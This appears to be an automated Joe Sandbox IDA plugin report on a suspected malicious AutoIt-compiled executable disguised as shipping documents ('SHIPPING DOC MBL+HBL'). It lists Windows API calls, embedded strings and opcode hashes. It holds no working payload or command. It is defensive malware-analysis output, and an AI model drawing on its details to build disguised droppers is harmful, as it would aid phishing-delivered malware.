                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl$Ck
                    • API String ID: 1212759294-4079180798
                    • Opcode ID: b50c3e9a281dfc4155b5e1f6e5ab2070e1080cef649473b4f20fe2f357b21a12
                    • Instruction ID: 669e43d55127a578e2fc1bf428dcac035c8111e552effa3b34da2197b4fcbc7f
                    • Opcode Fuzzy Hash: b50c3e9a281dfc4155b5e1f6e5ab2070e1080cef649473b4f20fe2f357b21a12
                    • Instruction Fuzzy Hash: B161FF71900619BEEB18EF64CC81FBE77A8EB08710F10551AF91DF61D1DB74AA84CBA0
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00E8448D
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E844D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: e5812ceee4a86463b0da6fb4bdc27b2120a71a0a5e984afab1ad944832ee09c8
                    • Instruction ID: 0d30ce238a7fee6887ba92566b605fa73bef549305a5073aa42abb0c05f4376e
                    • Opcode Fuzzy Hash: e5812ceee4a86463b0da6fb4bdc27b2120a71a0a5e984afab1ad944832ee09c8
                    • Instruction Fuzzy Hash: 40915BB02047129BCB14EF14C491AAAB7E1EF95314F14685DE89A7B3E3DB31ED49CB81
                    APIs
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • CharLowerBuffW.USER32(?,?), ref: 00E6A455
                    • GetDriveTypeW.KERNEL32 ref: 00E6A4A2
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A4EA
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A521
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A54F
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 38d306033ea6b5b5978ba462fcd33aefa37cffc334128b7b5ca12172366d1fca
                    • Instruction ID: 143a2af0b0b66ef265dfcec386a4e88693bcb9490d7ef4876fb274457aca110b
                    • Opcode Fuzzy Hash: 38d306033ea6b5b5978ba462fcd33aefa37cffc334128b7b5ca12172366d1fca
                    • Instruction Fuzzy Hash: 5F516C715043059FC700EF20D99186AB7E8EF98718F04596DF89A772A2DB31EE4ACB52
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                    • String ID:
                    • API String ID: 884005220-0
                    • Opcode ID: e7378f7aa6d3be7049a64bce67a08ddc710596cba431fb6efe6c507441f71310
                    • Instruction ID: de1a6fd02d62ea9993cb1340370ceccd83e80e5b7ec173097bde900b5a2323f5
                    • Opcode Fuzzy Hash: e7378f7aa6d3be7049a64bce67a08ddc710596cba431fb6efe6c507441f71310
                    • Instruction Fuzzy Hash: 48611672501211AFD7205F34DD09B6ABBE8EF40328F187139E881BB191DB39DD81C792
                    APIs
                    • __wsplitpath.LIBCMT ref: 00E6DA9C
                    • _wcscat.LIBCMT ref: 00E6DAB4
                    • _wcscat.LIBCMT ref: 00E6DAC6
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E6DADB
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6DAEF
                    • GetFileAttributesW.KERNEL32(?), ref: 00E6DB07
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E6DB21
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6DB33
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                    • String ID: *.*
                    • API String ID: 34673085-438819550
                    • Opcode ID: 767e20b05ee46c3e38e1346fc17d376cb67365b413a8450ba4ce89b821e0e93e
                    • Instruction ID: c09178d2c00dcc8c3f99a55754b878a8cc8a5fc0bad92b8d124bfbcc82757e7f
                    • Opcode Fuzzy Hash: 767e20b05ee46c3e38e1346fc17d376cb67365b413a8450ba4ce89b821e0e93e
                    • Instruction Fuzzy Hash: E2819372B4C2409FCB24EF64DC449AAB7E4BB88394F586C2EF489E7251D670D944CB92
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E8C266
                    • GetFocus.USER32 ref: 00E8C276
                    • GetDlgCtrlID.USER32(00000000), ref: 00E8C281
                    • _memset.LIBCMT ref: 00E8C3AC
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E8C3D7
                    • GetMenuItemCount.USER32(?), ref: 00E8C3F7
                    • GetMenuItemID.USER32(?,00000000), ref: 00E8C40A
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E8C43E
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E8C486
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E8C4BE
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E8C4F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: 813492b30bd122374ac80a061f539378fd6a98276a06c5ddbbf062ae3d8a650b
                    • Instruction ID: 6e4e52afeea772982703ab2208eca86c0748fe0cbc850fd1a136f18348bb3575
                    • Opcode Fuzzy Hash: 813492b30bd122374ac80a061f539378fd6a98276a06c5ddbbf062ae3d8a650b
                    • Instruction Fuzzy Hash: 66818F712083019FD710EF15D894A6B7BE4EF89318F20552DF9ADB7291C771D885CBA2
                    APIs
                    • GetDC.USER32(00000000), ref: 00E774A4
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E774B0
                    • CreateCompatibleDC.GDI32(?), ref: 00E774BC
                    • SelectObject.GDI32(00000000,?), ref: 00E774C9
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E7751D
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E77559
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E7757D
                    • SelectObject.GDI32(00000006,?), ref: 00E77585
                    • DeleteObject.GDI32(?), ref: 00E7758E
                    • DeleteDC.GDI32(00000006), ref: 00E77595
                    • ReleaseDC.USER32(00000000,?), ref: 00E775A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: a940f13eedff274a69ea6d2de2388b535c558208bd4f8d7ca533d7f6aa69aee4
                    • Instruction ID: dc532848b3a13fcb0ac25ebf0433caa218efdeb0e8ae5d4d3e6bda092f91e94e
                    • Opcode Fuzzy Hash: a940f13eedff274a69ea6d2de2388b535c558208bd4f8d7ca533d7f6aa69aee4
                    • Instruction Fuzzy Hash: 92515C71904309EFCB15CFA9DC85EAEBBB9EF48310F14842DF999A7251D731A944CB50
                    APIs
                      • Part of subcall function 00E20AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E06C6C,?,00008000), ref: 00E20AF3
                      • Part of subcall function 00E048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E048A1,?,?,00E037C0,?), ref: 00E048CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E06D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E06E5A
                      • Part of subcall function 00E059CD: _wcscpy.LIBCMT ref: 00E05A05
                      • Part of subcall function 00E237BD: _iswctype.LIBCMT ref: 00E237C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 96cdefb1d114cbe21afe77b8e96aa980b791c0cc228ac097eafc0a53a3fe7089
                    • Instruction ID: b2e4ff486c45843115fe9a7f94a691a9e36d39ba21a100bda3beefc7fa2264de
                    • Opcode Fuzzy Hash: 96cdefb1d114cbe21afe77b8e96aa980b791c0cc228ac097eafc0a53a3fe7089
                    • Instruction Fuzzy Hash: C0027E715083419FC724EF24C881AAFBBE5AF98354F04691DF495B72A1DB30EA89CB52
                    APIs
                    • _memset.LIBCMT ref: 00E045F9
                    • GetMenuItemCount.USER32(00EC5890), ref: 00E3D6FD
                    • GetMenuItemCount.USER32(00EC5890), ref: 00E3D7AD
                    • GetCursorPos.USER32(?), ref: 00E3D7F1
                    • SetForegroundWindow.USER32(00000000), ref: 00E3D7FA
                    • TrackPopupMenuEx.USER32(00EC5890,00000000,?,00000000,00000000,00000000), ref: 00E3D80D
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E3D819
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: 05553251f661cf921f4d7fdced3221cb253d734c066454670757bf8383a1249c
                    • Instruction ID: 87adf54adfadc32af910058b1fc3aae6bf3f467d794ad0fc87715089316ab907
                    • Opcode Fuzzy Hash: 05553251f661cf921f4d7fdced3221cb253d734c066454670757bf8383a1249c
                    • Instruction Fuzzy Hash: 657127B0644205BFEB219F55EC4AFAABFA4FF05368F101216F629B61E0C7B15C50CB90
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00E789EC
                    • CoInitialize.OLE32(00000000), ref: 00E78A19
                    • CoUninitialize.OLE32 ref: 00E78A23
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00E78B23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E78C50
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00E92C0C), ref: 00E78C84
                    • CoGetObject.OLE32(?,00000000,00E92C0C,?), ref: 00E78CA7
                    • SetErrorMode.KERNEL32(00000000), ref: 00E78CBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E78D3A
                    • VariantClear.OLEAUT32(?), ref: 00E78D4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID: ,,
                    • API String ID: 2395222682-1556401989
                    • Opcode ID: d3401ea0f84ca650eb0809c37a27dd4cd753294e0c6ef24f63d59398ebcad928
                    • Instruction ID: 5b347f8d2962c4dbe69261216d6d5859f9370351b214361c457c5c76aab4fab3
                    • Opcode Fuzzy Hash: d3401ea0f84ca650eb0809c37a27dd4cd753294e0c6ef24f63d59398ebcad928
                    • Instruction Fuzzy Hash: 2BC135B1608305AFC704DF64C98892BB7E9FF98348F00995DF98AAB251DB31ED45CB52
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FE38,?,?), ref: 00E80EBC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: 8a4b98a6800d0b15fbc5c3d0a99eb0c78bc77d501ee8b4346f740aea052723b5
                    • Instruction ID: 36e4c7dac135604ba573a16c8d828b4794f708477efe652ead5affdc9993e575
                    • Opcode Fuzzy Hash: 8a4b98a6800d0b15fbc5c3d0a99eb0c78bc77d501ee8b4346f740aea052723b5
                    • Instruction Fuzzy Hash: 83417C7020025A8BCF20EF10ECD2AEF3764AF91304F146469FD697B293DB35995ACB60
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E3E5F9,00000010,?,Bad directive syntax error,00E8F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E5FAF3
                    • LoadStringW.USER32(00000000,?,00E3E5F9,00000010), ref: 00E5FAFA
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    • _wprintf.LIBCMT ref: 00E5FB2D
                    • __swprintf.LIBCMT ref: 00E5FB4F
                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E5FBBE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                    • API String ID: 1506413516-4153970271
                    • Opcode ID: 518002edc14ef671e4df471a8d52f26ecc285e435a35b89618d36447f9e45cae
                    • Instruction ID: cdb01b01f1a4910247888acc10c6110d4895d91362395cb1124fa4780612f366
                    • Opcode Fuzzy Hash: 518002edc14ef671e4df471a8d52f26ecc285e435a35b89618d36447f9e45cae
                    • Instruction Fuzzy Hash: 5321937290021EEBCF16AF90CC56EEE7779BF14300F045465F505720A1DA71AA98DB90
                    APIs
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                      • Part of subcall function 00E07A84: _memmove.LIBCMT ref: 00E07B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E653D7
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E653ED
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E653FE
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E65410
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E65421
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: 6a19f16320afb26a42f25b7b267f5045aae3c95e980ab4dc9135dff9ac2af651
                    • Instruction ID: 1705aaab8ead3b13c7022fec61a56febc1041cbe048dce998abf372a5d0c687f
                    • Opcode Fuzzy Hash: 6a19f16320afb26a42f25b7b267f5045aae3c95e980ab4dc9135dff9ac2af651
                    • Instruction Fuzzy Hash: 7011C431A9022979D720B7A1DC4ADFF7BBCEB95B84F10246AB411B21D1DEA01D85CAB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: 0613e8082102ddc5f4c464be343330a6119fd77b53503d47993185b99f3d9d47
                    • Instruction ID: 652fd7cdb7686dd175a4b7b895f0967675402b749a8bafe0a08df224bc200dd6
                    • Opcode Fuzzy Hash: 0613e8082102ddc5f4c464be343330a6119fd77b53503d47993185b99f3d9d47
                    • Instruction Fuzzy Hash: 04110271A44114AFEB24AB20FC4AEEA77EC9B02710F0411B6F409B60D1EF71AAC58B50
                    APIs
                    • timeGetTime.WINMM ref: 00E65021
                      • Part of subcall function 00E2034A: timeGetTime.WINMM(?,75C0B400,00E10FDB), ref: 00E2034E
                    • Sleep.KERNEL32(0000000A), ref: 00E6504D
                    • EnumThreadWindows.USER32(?,Function_00064FCF,00000000), ref: 00E65071
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E65093
                    • SetActiveWindow.USER32 ref: 00E650B2
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E650C0
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E650DF
                    • Sleep.KERNEL32(000000FA), ref: 00E650EA
                    • IsWindow.USER32 ref: 00E650F6
                    • EndDialog.USER32(00000000), ref: 00E65107
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: b4a163aa3210e6b56507e4d53409b986d66b25ab707df27cfc1d6634b534d85b
                    • Instruction ID: 6e7dab8fd145396b5908334e9243b22e567a2147b2abc0ef8bdfb479487e343b
                    • Opcode Fuzzy Hash: b4a163aa3210e6b56507e4d53409b986d66b25ab707df27cfc1d6634b534d85b
                    • Instruction Fuzzy Hash: 26219272281A04AFE7005F22FC88F263B7AEB453C9F242434F006B11B1DB228C499B61
                    APIs
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • CoInitialize.OLE32(00000000), ref: 00E6D676
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E6D709
                    • SHGetDesktopFolder.SHELL32(?), ref: 00E6D71D
                    • CoCreateInstance.OLE32(00E92D7C,00000000,00000001,00EB8C1C,?), ref: 00E6D769
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E6D7D8
                    • CoTaskMemFree.OLE32(?,?), ref: 00E6D830
                    • _memset.LIBCMT ref: 00E6D86D
                    • SHBrowseForFolderW.SHELL32(?), ref: 00E6D8A9
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E6D8CC
                    • CoTaskMemFree.OLE32(00000000), ref: 00E6D8D3
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E6D90A
                    • CoUninitialize.OLE32(00000001,00000000), ref: 00E6D90C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
